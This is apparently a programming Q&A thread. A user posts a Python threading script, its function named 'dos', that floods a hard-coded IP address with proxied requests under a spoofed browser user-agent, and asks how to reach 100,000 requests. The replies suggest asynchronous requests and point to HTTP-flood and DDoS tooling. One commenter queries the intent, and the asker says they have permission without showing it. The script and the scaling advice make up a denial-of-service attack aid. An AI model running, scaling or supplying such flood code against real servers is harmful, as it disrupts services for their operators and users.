# What is the fastest way to send 100,000 requests to a given url?

Tags: python, multithreading, python-requests

Here is the source code:

```
import threading 
import requests
from time import sleep

f = open("http.txt")
proxy = f.readline()
proxies = {"https": f"https://{proxy}"}

def dos(proxies):
    headers = {"user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Avant Browser; Avant Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)"}
    url = 'http://176.9.10.17/HIT'
    f = open("http.txt")
    proxy = f.readline()
    proxies = {"https": f"https://{proxy}"}
    requests.get(url, headers=headers, proxies=proxies)

threads = []

for _ in range(500):
    t = threading.Thread(target=dos, args=proxies)
    t.start()
    threads.append(t)

for thread in threads:
    thread.join()
```

I've tried adding sleep when making the range 1,000 + and it got up to a max of 1.7k requests.
I would like to make it significantly quicker.

Comment: Might wanna censor that URL

Comment: Why are you trying to dos the url?

Comment: The url I have permission to attack in this way, it's dstat its a public testing url...

Comment: you know you are opening the reading the local http.txt file every single time? Seems redundant

Comment: You are already doing the necessary work - the lines outside the function that create `proxies` as a global, and the `args=proxies` argument to `threading.Thread`. You just need to remove the redundant creation of `proxies` inside `dos`; then it will use the `proxies` parameter value that was passed in (via the threading setup).

Answer (score 1):

I think you should look into asynchronous requests. Rather than waiting for each request to be completed, you can request asynchronously. The `asyncio+aiohttp` combination worked perfectly for me. [Here](https://realpython.com/async-io-python/) is an article describing how to use them.

They are specifically built for this purpose, and might / might not be faster than the `threading` solution. You'll have to give it a try to check.

Answer (score 0):

To flood test a server, pure Python is too slow. Use specialised tools -- e.g. the ones (incl. Python-based) listed at https://github.com/topics/http-flood.

Comment: I have seen my friends have pure python tools that hit at least 17k so I know it's possible you know.

Comment: @cashcash sure, it is (e.g. if you prepare a request packet to send, use multiple processes, call out to some 3rd-party DDoS C library etc), it's just complex and it's not a good investment of your time to reinvent it. By "pure Python", I meant sending requests with conventional means.

Comment: In addition, I just want to see what's the max I get out of python alone.

Comment: "Python alone" is not a well-defined thing so the question is unanswerable like this. E.g. `requests` is not in stdlib and includes an extension module -- does that count as "python alone"? Would a wrapper over a DDoS library count? Then, Python is not designed for speed, so if you place arbitrary limitations, you'd be intentionally using a wrong tool for the job and as such, this would not be a "practical programming question".